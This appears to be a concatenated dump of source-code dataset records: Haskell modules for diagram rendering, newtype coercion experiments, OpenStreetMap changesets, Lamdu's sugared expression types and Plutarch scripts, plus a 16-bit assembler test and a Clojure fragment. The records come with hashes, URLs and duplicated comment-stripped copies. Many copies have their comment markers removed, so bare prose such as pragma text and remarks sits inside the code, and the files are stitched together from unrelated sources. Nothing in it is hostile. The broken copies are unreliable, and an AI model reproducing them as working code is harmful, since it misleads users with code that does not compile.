drawGraph' Hierarchical = drawHier'
drawGraph' Adaptive = drawFlatAdaptive'
| Saves a diagram to an SVG file at the specified ' FilePath ' , with the specified ' ' . Only one dimension is needed , they are given in the format :
saveSVG :: FilePath -> Dimensions -> Diagram B -> IO ()
saveSVG path (w,h) d = renderSVG path (mkSizeSpec2D w h) d |
992e4f758bce263d5a5f09394e5fd39af556ab2628515549029f6afe53df6037 | mokus0/junkbox | NewtypeInlining.hs | module NewtypeInlining where
import Unsafe.Coerce
newtype Foo a = Foo a deriving (Eq, Show)
data FunctOr a
= Nil
| Cons a (FunctOr a)
| WhoKnows a [Either a (FunctOr [a])]
deriving (Eq, Show)
instance Functor FunctOr where
fmap f Nil = Nil
fmap f (Cons a b) = Cons (f a) (fmap f b)
fmap f (WhoKnows a b) = WhoKnows (f a) (map (either (Left . f) (Right . fmap (map f))) b)
foo :: FunctOr a -> FunctOr (Foo a)
foo = fmap Foo
unFoo :: FunctOr (Foo a) -> FunctOr a
unFoo = fmap (\(Foo a) -> a)
equivalent to foo , by identical representation of ( a ) ~ a
bar :: FunctOr a -> FunctOr (Foo a)
bar = unsafeCoerce
unBar :: FunctOr (Foo a) -> FunctOr a
unBar = unsafeCoerce
equivalent to i d ( once types are erased ; before that )
eep :: a -> Foo a
eep = Foo
-- question - does foo automatically become bar when compiling?
-- what about unFoo? eep? | null | https://raw.githubusercontent.com/mokus0/junkbox/151014bbef9db2b9205209df66c418d6d58b0d9e/Haskell/TypeExperiments/NewtypeInlining.hs | haskell | question - does foo automatically become bar when compiling?
what about unFoo? eep? | module NewtypeInlining where
import Unsafe.Coerce
newtype Foo a = Foo a deriving (Eq, Show)
data FunctOr a
= Nil
| Cons a (FunctOr a)
| WhoKnows a [Either a (FunctOr [a])]
deriving (Eq, Show)
instance Functor FunctOr where
fmap f Nil = Nil
fmap f (Cons a b) = Cons (f a) (fmap f b)
fmap f (WhoKnows a b) = WhoKnows (f a) (map (either (Left . f) (Right . fmap (map f))) b)
foo :: FunctOr a -> FunctOr (Foo a)
foo = fmap Foo
unFoo :: FunctOr (Foo a) -> FunctOr a
unFoo = fmap (\(Foo a) -> a)
equivalent to foo , by identical representation of ( a ) ~ a
bar :: FunctOr a -> FunctOr (Foo a)
bar = unsafeCoerce
unBar :: FunctOr (Foo a) -> FunctOr a
unBar = unsafeCoerce
equivalent to i d ( once types are erased ; before that )
eep :: a -> Foo a
eep = Foo
|
c25b3ab30e753fbced3e29d500025e879ae7157f12d67f11500555c54efbd9fb | tonymorris/geo-osm | Changeset.hs | # LANGUAGE FlexibleInstances , MultiParamTypeClasses #
| The @changeset@ element of a OSM file .
module Data.Geo.OSM.Changeset
(
Changeset
, changeset
) where
import Text.XML.HXT.Arrow.Pickle
import Data.Geo.OSM.Tag
import Data.Geo.OSM.Lens.TagsL
import Control.Lens.Lens
import Control.Newtype
| The @changeset@ element of a OSM file .
newtype Changeset =
Changeset [Tag]
deriving Eq
-- | Constructs a @changeset@ with tags.
changeset ::
[Tag] -- ^ The list of tags (@tag@ elements).
-> Changeset
changeset =
Changeset
instance XmlPickler Changeset where
xpickle =
xpElem "changeset" (xpWrap (changeset, \(Changeset r) -> r) (xpList xpickle))
instance Show Changeset where
show =
showPickled []
instance TagsL Changeset where
tagsL =
lens unpack (const pack)
instance Newtype Changeset [Tag] where
pack =
Changeset
unpack (Changeset x) =
x
| null | https://raw.githubusercontent.com/tonymorris/geo-osm/776542be2fd30a05f0f9e867128eca5ad5d66bec/src/Data/Geo/OSM/Changeset.hs | haskell | | Constructs a @changeset@ with tags.
^ The list of tags (@tag@ elements). | # LANGUAGE FlexibleInstances , MultiParamTypeClasses #
| The @changeset@ element of a OSM file .
module Data.Geo.OSM.Changeset
(
Changeset
, changeset
) where
import Text.XML.HXT.Arrow.Pickle
import Data.Geo.OSM.Tag
import Data.Geo.OSM.Lens.TagsL
import Control.Lens.Lens
import Control.Newtype
| The @changeset@ element of a OSM file .
newtype Changeset =
Changeset [Tag]
deriving Eq
changeset ::
-> Changeset
changeset =
Changeset
instance XmlPickler Changeset where
xpickle =
xpElem "changeset" (xpWrap (changeset, \(Changeset r) -> r) (xpList xpickle))
instance Show Changeset where
show =
showPickled []
instance TagsL Changeset where
tagsL =
lens unpack (const pack)
instance Newtype Changeset [Tag] where
pack =
Changeset
unpack (Changeset x) =
x
|
29078c5b27031c1e2de98abb859b0c81017d1d06c159423198ee6cfd4b97d602 | lamdu/lamdu | Expression.hs | # LANGUAGE TemplateHaskell , TypeFamilies , MultiParamTypeClasses , UndecidableInstances , DataKinds , GADTs , ConstraintKinds , FlexibleInstances #
module Lamdu.Sugar.Types.Expression
( Expr, Body
, Term(..)
, _BodyLam, _BodyLabeledApply, _BodySimpleApply
, _BodyRecord, _BodyFragment, _BodyLeaf, _BodyNullaryInject
, _BodyToNom, _BodyIfElse, _BodyPostfixApply, _BodyPostfixFunc
, Leaf(..), _LeafLiteral, _LeafHole, _LeafGetVar, _LeafInject
, AnnotatedArg(..), aaTag, aaExpr
, OperatorArgs(..), oaLhs, oaRhs, oaSwapArguments
, LabeledApply(..), aFunc, aMOpArgs, aAnnotatedArgs, aPunnedArgs
, PostfixApply(..), pArg, pFunc
, PostfixFunc(..), _PfCase, _PfFromNom, _PfGetField
, App(..), appFunc, appArg
, Lambda(..), lamFunc, lamLightweight, lamApplyLimit
, Nominal(..), nTId, nVal
-- Binders
, Let(..), lValue, lNames, lBody
, Meta.DefinitionState(..)
, BinderParamScopeId(..), bParamScopeId
, Binder(..), bBody, bAddOuterLet
, BinderBody(..), _BinderLet, _BinderTerm
, Function(..), fChosenScopeProp, fParams, fBody, fBodyScopes
, AssignPlain(..), apAddFirstParam, apBody
, Assignment(..), _BodyFunction, _BodyPlain
-- Holes
, Hole(..), holeOptions, holeTagSuffixes
, HoleOpt(..), _HoleBinder, _HoleVarsRecord
, Query(..), qLangInfo, qSearchTerm
, QueryLangInfo(..), qLangId, qLangDir, qCodeTexts, qUITexts, qNameTexts
, hasQueryLangInfo
-- Fragments
, Fragment(..), fExpr, fHeal, fTypeMismatch, fOptions, fOptApply, fTagSuffixes
, FragOpt(..), _FragPostfix, _FragInject, _FragApplyFunc, _FragOp
, FragOperator(..), oFunc, oRightArg, oAnnotatedArgs
-- If/else
, IfElse(..), iIf, iThen, iElse
, Else(..), _SimpleElse, _ElseIf
, ElseIfBody(..), eAddLet, eIfElse
-- Record & Cases
, Composite(..), cList, cPunnedItems, cTail
, CompositeTail(..), _OpenCompositeTail, _ClosedCompositeTail
, PunnedVar(..), pvVar, pvTagEntityId
, MorphWitness(..)
) where
import qualified Control.Lens as Lens
import Data.Property (Property)
import Data.Kind (Type)
import Hyper
import Hyper.Syntax (App(..), appFunc, appArg)
import Lamdu.Data.Anchors (BinderParamScopeId(..), bParamScopeId)
import qualified Lamdu.Data.Meta as Meta
import Lamdu.Sugar.Internal.EntityId (EntityId)
import Lamdu.Sugar.Types.Eval (ParamScopes)
import Lamdu.Sugar.Types.GetVar (GetVar)
import Lamdu.Sugar.Types.Lhs (LhsNames)
import Lamdu.Sugar.Types.Parts
import Lamdu.Sugar.Types.Tag
import Lamdu.Sugar.Types.TaggedList (TaggedList)
import Lamdu.Sugar.Types.Type (TId)
import qualified Lamdu.Sugar.Types.Type as T
import Lamdu.Prelude
type Body e v name (i :: Type -> Type) o = e v name i o # Annotated (Payload v o)
data AnnotatedArg v name i o k = AnnotatedArg
{ _aaTag :: Tag name
, _aaExpr :: k :# Term v name i o
} deriving Generic
data OperatorArgs v name i o k = OperatorArgs
{ _oaLhs :: k :# Term v name i o
, _oaRhs :: k :# Term v name i o
, _oaSwapArguments :: o Bool -- Returns whether fragment were added or removed
} deriving Generic
-- TODO: func + specialArgs into a single sum type so that field order
matches order , no need for special traversal code
data LabeledApply v name i o k = LabeledApply
{ _aFunc :: k :# Const (GetVar name o)
, _aMOpArgs :: Maybe (OperatorArgs v name i o k)
, _aAnnotatedArgs :: [AnnotatedArg v name i o k]
, _aPunnedArgs :: [PunnedVar name o k]
} deriving Generic
data PostfixApply v name i o k = PostfixApply
{ _pArg :: k :# Term v name i o
, _pFunc :: k :# PostfixFunc v name i o
} deriving Generic
data Lambda v name i o f = Lambda
{ _lamLightweight :: Bool
, _lamApplyLimit :: FuncApplyLimit
, _lamFunc :: Function v name i o f
} deriving Generic
-- | An expression marked for transformation.
-- Holds an expression to be transformed but acts like a hole.
data Fragment v name i o k = Fragment
{ _fExpr :: k :# Term v name i o
, _fHeal :: o EntityId
, _fTypeMismatch :: Maybe (Annotated EntityId # T.Type name)
, _fOptions :: i (Query -> i [Option FragOpt name i o])
, _fOptApply :: i (Option FragOpt name i o)
-- An option to apply (with a hole).
Used for the actions to turn this hole into literal ( i.e pressing " 5 " )
, _fTagSuffixes :: TagSuffixes -- See comment for holeTagSuffixes
} deriving Generic
data FragOpt v name i o k
= FragPostfix [k :# PostfixFunc v name i o] -- a single option can suggest chaining of multiple post-fix applications
| FragInject (TagRef name i o)
| FragWrapInRec (TagRef name i o)
| FragApplyFunc (GetVar name o)
| FragOp (FragOperator v name i o k)
| FragToNom (TId name)
| FragLam
| FragDefer
| FragIf (k :# Term v name i o)
| FragArgument (HoleOpt v name i o k) -- Apply fragmented expr with argument
deriving Generic
data FragOperator v name i o k = FragOperator
{ _oFunc :: k :# Const (GetVar name o)
Argument on right - hand - side ( LTR ) of operator .
-- (usually a hole, but may be completed to other values)
_oRightArg :: k :# Term v name i o
, _oAnnotatedArgs :: [Tag name]
} deriving Generic
data Hole name i o = Hole
{ _holeOptions ::
i (Query -> i [Option HoleOpt name i o])
Inner ` i ` serves two purposes :
-- Name walk requires monadic place to process names.
-- Hole can prepare results depending on the query and avoid doing work
-- if the query filters it out.
, _holeTagSuffixes :: TagSuffixes
-- When tag suffixes are created by the name pass this is populated,
-- should be given back in the query.
-- TODO: More elegant solution?
} deriving stock Generic
data HoleOpt v name i o k
= HoleBinder (Binder v name i o k)
| HoleVarsRecord [name] -- List of fields
deriving stock Generic
data Else v name i o f
= SimpleElse (Term v name i o f)
| ElseIf (ElseIfBody v name i o f)
deriving Generic
data ElseIfBody v name i o k = ElseIfBody
{ _eAddLet :: o EntityId
-- The inner if-expression that turned into an else-if,
-- was a possible binder for let-items.
-- The user should be able to add let-items in there (and turn it into a normal else).
, _eIfElse :: IfElse v name i o k
} deriving Generic
data IfElse v name i o k = IfElse
{ _iIf :: k :# Term v name i o
, _iThen :: k :# Term v name i o
, _iElse :: k :# Else v name i o
} deriving Generic
data CompositeTail v name i o k
= OpenCompositeTail (k :# Term v name i o)
| ClosedCompositeTail (ClosedCompositeActions o)
deriving Generic
data Composite v name i o k = Composite
{ _cList :: TaggedList name i o (k :# Term v name i o)
Punned items are like 's NamedFieldPuns
_cPunnedItems :: [PunnedVar name o k]
, _cTail :: CompositeTail v name i o k
} deriving Generic
data Nominal v name i o k = Nominal
{ _nTId :: TId name
, _nVal :: k :# Binder v name i o
} deriving Generic
data PostfixFunc v name i o k
= PfCase (Composite v name i o k)
| PfFromNom (TId name)
| PfGetField (TagRef name i o)
deriving Generic
data Leaf name i o
= LeafLiteral (Literal (Property o))
| LeafHole (Hole name i o)
| LeafGetVar (GetVar name o)
| LeafInject (TagRef name i o)
deriving Generic
data Term v name i o k
= BodyLam (Lambda v name i o k)
| BodySimpleApply (App (Term v name i o) k)
-- ^ A simple function application (aka function call): <function> <argument>
| BodyPostfixApply (PostfixApply v name i o k)
-- ^ A function application presented with postfix layout: <argument> .<function>
-- (used for pattern matching, record field access and nominal type unwrapping)
| BodyPostfixFunc (PostfixFunc v name i o k)
-- ^ A function for which postfix application layout apply.
| BodyLabeledApply (LabeledApply v name i o k)
-- ^ A syntax sugar for function application with a record argument
| BodyRecord (Composite v name i o k)
| BodyIfElse (IfElse v name i o k)
| BodyToNom (Nominal v name i o k)
-- ^ Wrap a value with a nominal type constructor
| BodyNullaryInject (NullaryInject name i o k)
-- ^ A variant value with no content
| BodyFragment (Fragment v name i o k)
-- ^ A fragment holds an unfinished term in the code.
-- Often generated when the inner term's type mismatches the expected type
-- at the fragment.
-- Also used as a placeholder for parentheses during typing.
| BodyLeaf (Leaf name i o)
deriving Generic
data Let v name i o k = Let
{ _lValue :: k :# Assignment v name i o -- "let foo = [[bar]] in x"
, _lNames :: LhsNames name i o v -- let [[foo]] = bar in x
, _lBody :: k :# Binder v name i o -- "let foo = bar in [[x]]"
} deriving Generic
-- An expression with 0 or more let items,
-- Appear in a:
-- * Function: "\x -> [[THIS]]"
-- * ToNom: "«X [[THIS]]"
-- * Definition or let item value: "x = [[THIS]]"
-- * Let-item/redex: "let x = y in [[THIS]]"
data Binder v name i o k = Binder
{ _bAddOuterLet :: o EntityId
, _bBody :: BinderBody v name i o k
} deriving Generic
data BinderBody v name i o k
= BinderLet (Let v name i o k)
| BinderTerm (Term v name i o k)
deriving Generic
data Function v name i o k = Function
{ _fChosenScopeProp :: i (Property o (Maybe BinderParamScopeId))
, _fParams :: LhsNames name i o v
, _fBody :: k :# Binder v name i o
, -- The scope inside a lambda
_fBodyScopes :: ParamScopes
} deriving Generic
data AssignPlain v name i o f = AssignPlain
{ _apAddFirstParam :: o EntityId
, _apBody :: Binder v name i o f
} deriving Generic
data Assignment v name i o f
= BodyFunction (Function v name i o f)
| BodyPlain (AssignPlain v name i o f)
deriving Generic
traverse Lens.makeLenses
[ ''AnnotatedArg, ''AssignPlain, ''Binder
, ''Composite, ''Fragment, ''FragOperator
, ''Function, ''Hole
, ''IfElse, ''ElseIfBody, ''LabeledApply, ''Lambda, ''Let
, ''Nominal, ''OperatorArgs, ''PostfixApply
] <&> concat
traverse Lens.makePrisms
[''Assignment, ''BinderBody, ''CompositeTail, ''Else
, ''FragOpt, ''HoleOpt, ''Leaf, ''PostfixFunc, ''Term
] <&> concat
traverse makeHTraversableAndBases
[ ''AnnotatedArg, ''Assignment, ''AssignPlain, ''Binder, ''BinderBody
, ''Composite, ''CompositeTail, ''Else, ''ElseIfBody
, ''Fragment, ''FragOperator, ''FragOpt, ''Function, ''HoleOpt, ''IfElse
, ''LabeledApply, ''Lambda, ''Let, ''Nominal
, ''OperatorArgs, ''PostfixApply, ''PostfixFunc, ''Term
] <&> concat
traverse makeHMorph
[ ''Composite, ''FragOperator, ''IfElse, ''LabeledApply, ''Let, ''OperatorArgs, ''PostfixApply, ''PostfixFunc
] <&> concat
TODO : Replace boilerplate below with TH
instance RNodes (Assignment v name i o)
instance RNodes (Binder v name i o)
instance RNodes (Else v name i o)
instance RNodes (Function v name i o)
instance RNodes (FragOpt v name i o)
instance RNodes (HoleOpt v name i o)
instance RNodes (PostfixFunc v name i o)
instance RNodes (Term v name i o)
type Dep v (c :: HyperType -> Constraint) name i o =
( c (Assignment v name i o)
, c (Binder v name i o)
, c (Const (GetVar name o))
, c (Const (i (TagChoice name o)))
, c (Const (TagRef name i o))
, c (Else v name i o)
, c (PostfixFunc v name i o)
, c (Term v name i o)
)
instance Dep v c name i o => Recursively c (Assignment v name i o)
instance Dep v c name i o => Recursively c (Binder v name i o)
instance Dep v c name i o => Recursively c (Else v name i o)
instance Dep v c name i o => Recursively c (PostfixFunc v name i o)
instance Dep v c name i o => Recursively c (Term v name i o)
instance (Dep v c name i o, c (HoleOpt v name i o)) => Recursively c (HoleOpt v name i o)
instance (Dep v c name i o, c (FragOpt v name i o)) => Recursively c (FragOpt v name i o)
instance (Dep v c name i o, c (Function v name i o)) => Recursively c (Function v name i o)
instance RTraversable (Assignment v name i o)
instance RTraversable (Binder v name i o)
instance RTraversable (Else v name i o)
instance RTraversable (PostfixFunc v name i o)
instance RTraversable (Term v name i o)
| null | https://raw.githubusercontent.com/lamdu/lamdu/2ff69bf3abfa1f2d512265919210176cda94e48e/src/Lamdu/Sugar/Types/Expression.hs | haskell | Binders
Holes
Fragments
If/else
Record & Cases
Returns whether fragment were added or removed
TODO: func + specialArgs into a single sum type so that field order
| An expression marked for transformation.
Holds an expression to be transformed but acts like a hole.
An option to apply (with a hole).
See comment for holeTagSuffixes
a single option can suggest chaining of multiple post-fix applications
Apply fragmented expr with argument
(usually a hole, but may be completed to other values)
Name walk requires monadic place to process names.
Hole can prepare results depending on the query and avoid doing work
if the query filters it out.
When tag suffixes are created by the name pass this is populated,
should be given back in the query.
TODO: More elegant solution?
List of fields
The inner if-expression that turned into an else-if,
was a possible binder for let-items.
The user should be able to add let-items in there (and turn it into a normal else).
^ A simple function application (aka function call): <function> <argument>
^ A function application presented with postfix layout: <argument> .<function>
(used for pattern matching, record field access and nominal type unwrapping)
^ A function for which postfix application layout apply.
^ A syntax sugar for function application with a record argument
^ Wrap a value with a nominal type constructor
^ A variant value with no content
^ A fragment holds an unfinished term in the code.
Often generated when the inner term's type mismatches the expected type
at the fragment.
Also used as a placeholder for parentheses during typing.
"let foo = [[bar]] in x"
let [[foo]] = bar in x
"let foo = bar in [[x]]"
An expression with 0 or more let items,
Appear in a:
* Function: "\x -> [[THIS]]"
* ToNom: "«X [[THIS]]"
* Definition or let item value: "x = [[THIS]]"
* Let-item/redex: "let x = y in [[THIS]]"
The scope inside a lambda | # LANGUAGE TemplateHaskell , TypeFamilies , MultiParamTypeClasses , UndecidableInstances , DataKinds , GADTs , ConstraintKinds , FlexibleInstances #
module Lamdu.Sugar.Types.Expression
( Expr, Body
, Term(..)
, _BodyLam, _BodyLabeledApply, _BodySimpleApply
, _BodyRecord, _BodyFragment, _BodyLeaf, _BodyNullaryInject
, _BodyToNom, _BodyIfElse, _BodyPostfixApply, _BodyPostfixFunc
, Leaf(..), _LeafLiteral, _LeafHole, _LeafGetVar, _LeafInject
, AnnotatedArg(..), aaTag, aaExpr
, OperatorArgs(..), oaLhs, oaRhs, oaSwapArguments
, LabeledApply(..), aFunc, aMOpArgs, aAnnotatedArgs, aPunnedArgs
, PostfixApply(..), pArg, pFunc
, PostfixFunc(..), _PfCase, _PfFromNom, _PfGetField
, App(..), appFunc, appArg
, Lambda(..), lamFunc, lamLightweight, lamApplyLimit
, Nominal(..), nTId, nVal
, Let(..), lValue, lNames, lBody
, Meta.DefinitionState(..)
, BinderParamScopeId(..), bParamScopeId
, Binder(..), bBody, bAddOuterLet
, BinderBody(..), _BinderLet, _BinderTerm
, Function(..), fChosenScopeProp, fParams, fBody, fBodyScopes
, AssignPlain(..), apAddFirstParam, apBody
, Assignment(..), _BodyFunction, _BodyPlain
, Hole(..), holeOptions, holeTagSuffixes
, HoleOpt(..), _HoleBinder, _HoleVarsRecord
, Query(..), qLangInfo, qSearchTerm
, QueryLangInfo(..), qLangId, qLangDir, qCodeTexts, qUITexts, qNameTexts
, hasQueryLangInfo
, Fragment(..), fExpr, fHeal, fTypeMismatch, fOptions, fOptApply, fTagSuffixes
, FragOpt(..), _FragPostfix, _FragInject, _FragApplyFunc, _FragOp
, FragOperator(..), oFunc, oRightArg, oAnnotatedArgs
, IfElse(..), iIf, iThen, iElse
, Else(..), _SimpleElse, _ElseIf
, ElseIfBody(..), eAddLet, eIfElse
, Composite(..), cList, cPunnedItems, cTail
, CompositeTail(..), _OpenCompositeTail, _ClosedCompositeTail
, PunnedVar(..), pvVar, pvTagEntityId
, MorphWitness(..)
) where
import qualified Control.Lens as Lens
import Data.Property (Property)
import Data.Kind (Type)
import Hyper
import Hyper.Syntax (App(..), appFunc, appArg)
import Lamdu.Data.Anchors (BinderParamScopeId(..), bParamScopeId)
import qualified Lamdu.Data.Meta as Meta
import Lamdu.Sugar.Internal.EntityId (EntityId)
import Lamdu.Sugar.Types.Eval (ParamScopes)
import Lamdu.Sugar.Types.GetVar (GetVar)
import Lamdu.Sugar.Types.Lhs (LhsNames)
import Lamdu.Sugar.Types.Parts
import Lamdu.Sugar.Types.Tag
import Lamdu.Sugar.Types.TaggedList (TaggedList)
import Lamdu.Sugar.Types.Type (TId)
import qualified Lamdu.Sugar.Types.Type as T
import Lamdu.Prelude
type Body e v name (i :: Type -> Type) o = e v name i o # Annotated (Payload v o)
data AnnotatedArg v name i o k = AnnotatedArg
{ _aaTag :: Tag name
, _aaExpr :: k :# Term v name i o
} deriving Generic
data OperatorArgs v name i o k = OperatorArgs
{ _oaLhs :: k :# Term v name i o
, _oaRhs :: k :# Term v name i o
} deriving Generic
matches order , no need for special traversal code
data LabeledApply v name i o k = LabeledApply
{ _aFunc :: k :# Const (GetVar name o)
, _aMOpArgs :: Maybe (OperatorArgs v name i o k)
, _aAnnotatedArgs :: [AnnotatedArg v name i o k]
, _aPunnedArgs :: [PunnedVar name o k]
} deriving Generic
data PostfixApply v name i o k = PostfixApply
{ _pArg :: k :# Term v name i o
, _pFunc :: k :# PostfixFunc v name i o
} deriving Generic
data Lambda v name i o f = Lambda
{ _lamLightweight :: Bool
, _lamApplyLimit :: FuncApplyLimit
, _lamFunc :: Function v name i o f
} deriving Generic
data Fragment v name i o k = Fragment
{ _fExpr :: k :# Term v name i o
, _fHeal :: o EntityId
, _fTypeMismatch :: Maybe (Annotated EntityId # T.Type name)
, _fOptions :: i (Query -> i [Option FragOpt name i o])
, _fOptApply :: i (Option FragOpt name i o)
Used for the actions to turn this hole into literal ( i.e pressing " 5 " )
} deriving Generic
data FragOpt v name i o k
| FragInject (TagRef name i o)
| FragWrapInRec (TagRef name i o)
| FragApplyFunc (GetVar name o)
| FragOp (FragOperator v name i o k)
| FragToNom (TId name)
| FragLam
| FragDefer
| FragIf (k :# Term v name i o)
deriving Generic
data FragOperator v name i o k = FragOperator
{ _oFunc :: k :# Const (GetVar name o)
Argument on right - hand - side ( LTR ) of operator .
_oRightArg :: k :# Term v name i o
, _oAnnotatedArgs :: [Tag name]
} deriving Generic
data Hole name i o = Hole
{ _holeOptions ::
i (Query -> i [Option HoleOpt name i o])
Inner ` i ` serves two purposes :
, _holeTagSuffixes :: TagSuffixes
} deriving stock Generic
data HoleOpt v name i o k
= HoleBinder (Binder v name i o k)
deriving stock Generic
data Else v name i o f
= SimpleElse (Term v name i o f)
| ElseIf (ElseIfBody v name i o f)
deriving Generic
data ElseIfBody v name i o k = ElseIfBody
{ _eAddLet :: o EntityId
, _eIfElse :: IfElse v name i o k
} deriving Generic
data IfElse v name i o k = IfElse
{ _iIf :: k :# Term v name i o
, _iThen :: k :# Term v name i o
, _iElse :: k :# Else v name i o
} deriving Generic
data CompositeTail v name i o k
= OpenCompositeTail (k :# Term v name i o)
| ClosedCompositeTail (ClosedCompositeActions o)
deriving Generic
data Composite v name i o k = Composite
{ _cList :: TaggedList name i o (k :# Term v name i o)
Punned items are like 's NamedFieldPuns
_cPunnedItems :: [PunnedVar name o k]
, _cTail :: CompositeTail v name i o k
} deriving Generic
data Nominal v name i o k = Nominal
{ _nTId :: TId name
, _nVal :: k :# Binder v name i o
} deriving Generic
data PostfixFunc v name i o k
= PfCase (Composite v name i o k)
| PfFromNom (TId name)
| PfGetField (TagRef name i o)
deriving Generic
data Leaf name i o
= LeafLiteral (Literal (Property o))
| LeafHole (Hole name i o)
| LeafGetVar (GetVar name o)
| LeafInject (TagRef name i o)
deriving Generic
data Term v name i o k
= BodyLam (Lambda v name i o k)
| BodySimpleApply (App (Term v name i o) k)
| BodyPostfixApply (PostfixApply v name i o k)
| BodyPostfixFunc (PostfixFunc v name i o k)
| BodyLabeledApply (LabeledApply v name i o k)
| BodyRecord (Composite v name i o k)
| BodyIfElse (IfElse v name i o k)
| BodyToNom (Nominal v name i o k)
| BodyNullaryInject (NullaryInject name i o k)
| BodyFragment (Fragment v name i o k)
| BodyLeaf (Leaf name i o)
deriving Generic
data Let v name i o k = Let
} deriving Generic
data Binder v name i o k = Binder
{ _bAddOuterLet :: o EntityId
, _bBody :: BinderBody v name i o k
} deriving Generic
data BinderBody v name i o k
= BinderLet (Let v name i o k)
| BinderTerm (Term v name i o k)
deriving Generic
data Function v name i o k = Function
{ _fChosenScopeProp :: i (Property o (Maybe BinderParamScopeId))
, _fParams :: LhsNames name i o v
, _fBody :: k :# Binder v name i o
_fBodyScopes :: ParamScopes
} deriving Generic
data AssignPlain v name i o f = AssignPlain
{ _apAddFirstParam :: o EntityId
, _apBody :: Binder v name i o f
} deriving Generic
data Assignment v name i o f
= BodyFunction (Function v name i o f)
| BodyPlain (AssignPlain v name i o f)
deriving Generic
traverse Lens.makeLenses
[ ''AnnotatedArg, ''AssignPlain, ''Binder
, ''Composite, ''Fragment, ''FragOperator
, ''Function, ''Hole
, ''IfElse, ''ElseIfBody, ''LabeledApply, ''Lambda, ''Let
, ''Nominal, ''OperatorArgs, ''PostfixApply
] <&> concat
traverse Lens.makePrisms
[''Assignment, ''BinderBody, ''CompositeTail, ''Else
, ''FragOpt, ''HoleOpt, ''Leaf, ''PostfixFunc, ''Term
] <&> concat
traverse makeHTraversableAndBases
[ ''AnnotatedArg, ''Assignment, ''AssignPlain, ''Binder, ''BinderBody
, ''Composite, ''CompositeTail, ''Else, ''ElseIfBody
, ''Fragment, ''FragOperator, ''FragOpt, ''Function, ''HoleOpt, ''IfElse
, ''LabeledApply, ''Lambda, ''Let, ''Nominal
, ''OperatorArgs, ''PostfixApply, ''PostfixFunc, ''Term
] <&> concat
traverse makeHMorph
[ ''Composite, ''FragOperator, ''IfElse, ''LabeledApply, ''Let, ''OperatorArgs, ''PostfixApply, ''PostfixFunc
] <&> concat
TODO : Replace boilerplate below with TH
instance RNodes (Assignment v name i o)
instance RNodes (Binder v name i o)
instance RNodes (Else v name i o)
instance RNodes (Function v name i o)
instance RNodes (FragOpt v name i o)
instance RNodes (HoleOpt v name i o)
instance RNodes (PostfixFunc v name i o)
instance RNodes (Term v name i o)
type Dep v (c :: HyperType -> Constraint) name i o =
( c (Assignment v name i o)
, c (Binder v name i o)
, c (Const (GetVar name o))
, c (Const (i (TagChoice name o)))
, c (Const (TagRef name i o))
, c (Else v name i o)
, c (PostfixFunc v name i o)
, c (Term v name i o)
)
instance Dep v c name i o => Recursively c (Assignment v name i o)
instance Dep v c name i o => Recursively c (Binder v name i o)
instance Dep v c name i o => Recursively c (Else v name i o)
instance Dep v c name i o => Recursively c (PostfixFunc v name i o)
instance Dep v c name i o => Recursively c (Term v name i o)
instance (Dep v c name i o, c (HoleOpt v name i o)) => Recursively c (HoleOpt v name i o)
instance (Dep v c name i o, c (FragOpt v name i o)) => Recursively c (FragOpt v name i o)
instance (Dep v c name i o, c (Function v name i o)) => Recursively c (Function v name i o)
instance RTraversable (Assignment v name i o)
instance RTraversable (Binder v name i o)
instance RTraversable (Else v name i o)
instance RTraversable (PostfixFunc v name i o)
instance RTraversable (Term v name i o)
|
f3ece0b3e318014873096550b3a6b1036eb56ecfbcd5792f2d9cef2be4c457a7 | Liqwid-Labs/liqwid-plutarch-extra | Script.hs | module Plutarch.Extra.Script (applyArguments) where
import Control.Lens (over)
import Plutarch.Script (Script (Script))
import PlutusCore.Data qualified as PLC
import PlutusCore.MkPlc qualified as PLC
import UntypedPlutusCore qualified as UPLC
| Applys ' Data ' to Script
@since 3.20.0
@since 3.20.0
-}
applyArguments :: Script -> [PLC.Data] -> Script
applyArguments (Script p) args =
let termArgs = fmap (PLC.mkConstant ()) args
applied t = PLC.mkIterApp () t termArgs
in Script $ over UPLC.progTerm applied p
| null | https://raw.githubusercontent.com/Liqwid-Labs/liqwid-plutarch-extra/79604ece6d24c1e5d6e11c02e88f9e7907a19399/src/Plutarch/Extra/Script.hs | haskell | module Plutarch.Extra.Script (applyArguments) where
import Control.Lens (over)
import Plutarch.Script (Script (Script))
import PlutusCore.Data qualified as PLC
import PlutusCore.MkPlc qualified as PLC
import UntypedPlutusCore qualified as UPLC
| Applys ' Data ' to Script
@since 3.20.0
@since 3.20.0
-}
applyArguments :: Script -> [PLC.Data] -> Script
applyArguments (Script p) args =
let termArgs = fmap (PLC.mkConstant ()) args
applied t = PLC.mkIterApp () t termArgs
in Script $ over UPLC.progTerm applied p
| |
88b665032ef8faea022db02bb4fbe063f5c75a228c5ecbe7fe197e0c7c54920a | larcenists/larceny | 16with-win3.scm | (bits 16)
(text
(label foo (ret))
(label bar (ret))
(if (while (!= ax 3)
(seq (pop ax)
(inc ax)
(< ax 10)))
(with-win bar
(alt z! a!))
(with-win foo
(push bx))))
00000000 C3 ret
00000001 C3 ret
00000002 EB07 short 0xb
00000004 58 pop ax
00000005 40 inc ax
; 00000006 3D0A00 cmp ax,0xa
00000009 7D0E jnl 0x19
0000000B 3D0300 cmp ax,0x3
0000000E 75F4 jnz 0x4
00000010 0F84EDFF jz near 0x1
00000014 7607 jna 0x1d
00000016 E9E8FF jmp 0x1
00000019 53 push bx
0000001A E9E3FF jmp 0x0
| null | https://raw.githubusercontent.com/larcenists/larceny/fef550c7d3923deb7a5a1ccd5a628e54cf231c75/src/Lib/Sassy/tests/prims16/16with-win3.scm | scheme | 00000006 3D0A00 cmp ax,0xa | (bits 16)
(text
(label foo (ret))
(label bar (ret))
(if (while (!= ax 3)
(seq (pop ax)
(inc ax)
(< ax 10)))
(with-win bar
(alt z! a!))
(with-win foo
(push bx))))
00000000 C3 ret
00000001 C3 ret
00000002 EB07 short 0xb
00000004 58 pop ax
00000005 40 inc ax
00000009 7D0E jnl 0x19
0000000B 3D0300 cmp ax,0x3
0000000E 75F4 jnz 0x4
00000010 0F84EDFF jz near 0x1
00000014 7607 jna 0x1d
00000016 E9E8FF jmp 0x1
00000019 53 push bx
0000001A E9E3FF jmp 0x0
|
a777275a0c07edf0aab17aba0282c4be62a9a62ca0a094d87174cb3714a880d1 | Hendekagon/clique | core.clj | (ns clique.core
"
Function dependency graph generation
"
(:require
[clojure.tools.namespace.find :as nsf]
[clojure.java.io :as io]
[loom [graph :as lg]
[attr :as la]
[io :as lio]]))
(defn get-namespace-forms [filename]
(let [read-params {:eof nil}]
